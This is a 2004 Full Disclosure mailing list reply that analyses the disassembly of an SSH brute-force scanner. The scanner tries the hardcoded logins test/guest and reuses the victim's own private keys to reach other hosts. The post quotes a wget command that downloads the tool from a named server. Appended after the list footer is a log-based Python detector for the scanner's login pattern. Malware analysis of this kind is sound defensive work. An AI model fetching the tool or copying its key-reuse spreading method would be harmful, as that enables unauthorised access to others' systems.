Full Disclosure mailing list archives
Re: Automated SSH login attempts?
From: Jan Muenther <jan.muenther () nruns com>
Date: Sat, 31 Jul 2004 20:36:39 +0200
Hi there,
> Agreed. The thing *is* publicly available, just do 'wget frauder.us/linux/ssh.tgz'. What kept me from disassembling the thing so far is not availability, but lacking knowledge about the ssh protocol on my side ;-)
Hm, actually, there's fairly little of that required to see what this beast does... Guys, I can't help but sing the praise of IDA Pro. Get it, it's worth the money.
> The tool itself does not need root rights. What needs to be root is the portscanner accompanying it.
Yeah, found that too. That, however, is not surprising. It's a SYN-Scanner, using a detached scanning method, built on libnet (eh, too lazy for raw sockets, are we) and libpcap, and it's statically linked against it. Both binaries were not stripped by the way :> You'll need root rights for constructing packets with libnet and root rights to set the interface into promiscuous mode for the pcap captures.
> hehe. According to a brief look at the strace of this thingy, it does not do anything suspicious on the local box. But maybe I should have a second look - who knows?
Mkay, it really appears to be just an SSH scanner / bruteforcer, which next to the hardcoded username / password combinations also tries the identity / public key files of the current user to access other boxes. Some stuff from the disassembly (label names are mine, function names are from the binary, as I said, not stripped). So, it first tries to open uniq.txt for its input, nothing new, and bails out if it can't:

.text:080482E3 push offset aR ; "r"
.text:080482E8 push offset aUniq_txt ; "uniq.txt"
.text:080482ED call fopen
.text:080482F2 add esp, 10h
.text:080482F5 mov [ebp+var_C], eax
.text:080482F8 cmp [ebp+var_C], 0
.text:080482FC jnz short loc_8048314
.text:080482FE sub esp, 0Ch
.text:08048301 push offset aNuPotDeschideU ; "nu pot deschide uniq.txt\n"
.text:08048306 call printf

Is this Romanian? Seen it a lot recently...

.text:0804835B do_it: ; CODE XREF: main+86↑j
.text:0804835B call fork
.text:08048360 test eax, eax
.text:08048362 jnz short loc_80483A6
.text:08048364 sub esp, 4
.text:08048367 lea eax, [ebp+var_418]
.text:0804836D push eax
.text:0804836E push offset aTest ; "test"
.text:08048373 push offset aTest ; "test"
.text:08048378 call ccheckauth
.text:0804837D add esp, 10h
.text:08048380 sub esp, 4
.text:08048383 lea eax, [ebp+var_418]
.text:08048389 push eax
.text:0804838A push offset aGuest ; "guest"
.text:0804838F push offset aGuest ; "guest"
.text:08048394 call ccheckauth
.text:08048399 add esp, 10h
.text:0804839C sub esp, 0Ch
.text:0804839F push 0
.text:080483A1 call exit

Mkay, so, it forks and calls a function called ccheckauth(), giving test and guest as parameters for the username and password variables of that function. Once that's done, it exits.
So, here's that function:

.text:080481E8 public ccheckauth
.text:080481E8 ccheckauth proc near ; CODE XREF: main+AB↓p
.text:080481E8 ; main+C7↓p
.text:080481E8
.text:080481E8 var_14 = dword ptr -14h
.text:080481E8 var_10 = dword ptr -10h
.text:080481E8 var_C = dword ptr -0Ch
.text:080481E8 var_8 = dword ptr -8
.text:080481E8 var_4 = dword ptr -4
.text:080481E8 arg_0 = dword ptr 8
.text:080481E8 arg_4 = dword ptr 0Ch
.text:080481E8 arg_8 = dword ptr 10h
.text:080481E8
.text:080481E8 push ebp
.text:080481E9 mov ebp, esp
.text:080481EB sub esp, 18h
.text:080481EE mov [ebp+var_C], 1
.text:080481F5 mov [ebp+var_10], offset aNone ; "none"
.text:080481FC sub esp, 0Ch
.text:080481FF push 0Fh
.text:08048201 call alarm
.text:08048206 add esp, 10h
.text:08048209 sub esp, 8
.text:0804820C lea eax, [ebp+var_10]
.text:0804820F push eax
.text:08048210 lea eax, [ebp+var_C]
.text:08048213 push eax
.text:08048214 call ssh_getopt
.text:08048219 add esp, 10h
.text:0804821C mov [ebp+var_8], eax
.text:0804821F sub esp, 8
.text:08048222 push [ebp+arg_0]
.text:08048225 push [ebp+var_8]
.text:08048228 call options_set_username
.text:0804822D add esp, 10h
.text:08048230 sub esp, 8
.text:08048233 push [ebp+arg_8]
.text:08048236 push [ebp+var_8]
.text:08048239 call options_set_host
.text:0804823E add esp, 10h
.text:08048241 sub esp, 0Ch
.text:08048244 push [ebp+var_8]
.text:08048247 call ssh_connect
.text:0804824C add esp, 10h
.text:0804824F mov [ebp+var_4], eax
.text:08048252 cmp [ebp+var_4], 0
.text:08048256 jnz short loc_804825A
.text:08048258 jmp short locret_80482CB
.text:0804825A ; ---------------------------------------------------------------------------

It basically calls a bunch of other functions which do the entire session setup stuff for the SSH connection attempts.
These functions do exactly what their names imply, so I save the disassemblies here for brevity's sake. So, there's nothing spectacular here, it's an SSH bruteforcer. One thing though, it also uses key auth (determines the current user's home dir and looks for publickey and id files):

.text:08048B90 trykey: ; CODE XREF: ssh_userauth_autopubkey+F6↓j
.text:08048B90 sub esp, 8
.text:08048B93 lea eax, [ebp+var_10]
.text:08048B96 push eax
.text:08048B97 lea eax, [ebp+var_14]
.text:08048B9A push eax
.text:08048B9B lea eax, [ebp+var_18]
.text:08048B9E push eax
.text:08048B9F push offset keys_path
.text:08048BA4 push offset pub_keys_path
.text:08048BA9 push edi
.text:08048BAA call publickey_from_next_file
.text:08048BAF add esp, 20h
.text:08048BB2 test eax, eax
.text:08048BB4 mov ebx, eax
.text:08048BB6 jz nokeymatch
.text:08048BBC push ebx
.text:08048BBD mov eax, [ebp+var_14]
.text:08048BC0 push eax
.text:08048BC1 push 0
.text:08048BC3 push edi
.text:08048BC4 call ssh_userauth_offer_pubkey
.text:08048BC9 add esp, 10h
.text:08048BCC cmp eax, 0FFFFFFFFh
.text:08048BCF jz cleanupkey
.text:08048BD5 test eax, eax
.text:08048BD7 jnz pubrefused
.text:08048BDD push 0
.text:08048BDF mov eax, [ebp+var_14]
.text:08048BE2 push eax
.text:08048BE3 mov eax, [ebp+var_18]
.text:08048BE6 push eax
.text:08048BE7 push edi
.text:08048BE8 call privatekey_from_file
.text:08048BED add esp, 10h
.text:08048BF0 test eax, eax
.text:08048BF2 mov esi, eax
.text:08048BF4 jz readprivfail
.text:08048BFA push eax
.text:08048BFB push ebx
.text:08048BFC push 0
.text:08048BFE push edi
.text:08048BFF call ssh_userauth_pubkey
.text:08048C04 add esp, 10h
.text:08048C07 cmp eax, 0FFFFFFFFh
.text:08048C0A jz loc_8048CAA
.text:08048C10 test eax, eax
.text:08048C12 jz short auth_success
.text:08048C14 sub esp, 8
.text:08048C17 push offset aWeirdServerAcc ; "Weird : server accepted our public key "...
.text:08048C1C push 0
.text:08048C1E call ssh_say
.text:08048C23 mov [esp+38h+var_38], ebx
.text:08048C26 call free
.text:08048C2B mov [esp+38h+var_38], esi
.text:08048C2E call private_key_free

So, yeah, it's a bruteforcer, nothing magic here.
> Right. And somebody volunteered for this job right now, did you? ;-)
Eh. Limited time, new girlfriend is here and it's weekend :-/ So forgive the incompleteness of this :> Maybe more on Monday. FWIW, if there are other versions out, they might be more interesting than this tool.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
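From the defender's side, an added illustration (not code from the post, the tool it analyses, or the list): the listing above shows the scanner pushing "test"/"test" and then "guest"/"guest" to ccheckauth() for every host, each attempt bounded by alarm(15), so a source that fails exactly that pair of users in quick succession is a usable signature in sshd logs. The log lines, the 30 s window and the addresses are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines (not from the post); documentation IP ranges only.
SAMPLE_LOG = """\
Jul 31 20:36:40 bastion sshd[4001]: Illegal user test from 192.0.2.10
Jul 31 20:36:40 bastion sshd[4001]: Failed password for illegal user test from 192.0.2.10 port 40123 ssh2
Jul 31 20:36:41 bastion sshd[4002]: Illegal user guest from 192.0.2.10
Jul 31 20:36:41 bastion sshd[4002]: Failed password for illegal user guest from 192.0.2.10 port 40124 ssh2
Jul 31 20:40:02 bastion sshd[4010]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Jul 31 20:40:09 bastion sshd[4011]: Accepted password for alice from 198.51.100.7 port 51001 ssh2
Jul 31 21:02:15 bastion sshd[4020]: Illegal user test from 203.0.113.5
Jul 31 21:02:15 bastion sshd[4020]: Failed password for illegal user test from 203.0.113.5 port 33010 ssh2
"""

# The hardcoded pair the listing passes to ccheckauth(); alarm(15) bounds each
# attempt, so both tries should land close together. 30 s is an assumed heuristic.
SCANNER_USERS = ("test", "guest")
WINDOW_SECONDS = 30

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:illegal user |invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+")

def parse_failures(log):
    """Yield (timestamp, user, source) for every failed-password line."""
    for line in log.splitlines():
        m = FAILED.match(line)
        if m:
            # syslog lines carry no year; 2004 is assumed only so times compare
            ts = datetime.strptime("2004 " + m.group("ts"), "%Y %b %d %H:%M:%S")
            yield ts, m.group("user"), m.group("src")

def find_scanner_sources(log):
    """Return sources that failed both hardcoded users within WINDOW_SECONDS."""
    attempts = defaultdict(list)
    for ts, user, src in parse_failures(log):
        if user in SCANNER_USERS:
            attempts[src].append((ts, user))
    hits = []
    for src, seq in attempts.items():
        seq.sort()
        tried = {u for _, u in seq}
        span = (seq[-1][0] - seq[0][0]).total_seconds()
        if tried == set(SCANNER_USERS) and span <= WINDOW_SECONDS:
            hits.append(src)
    return sorted(hits)
```

A single "test" failure from 203.0.113.5 is deliberately not flagged; only the full pair within the window matches the tool's behaviour.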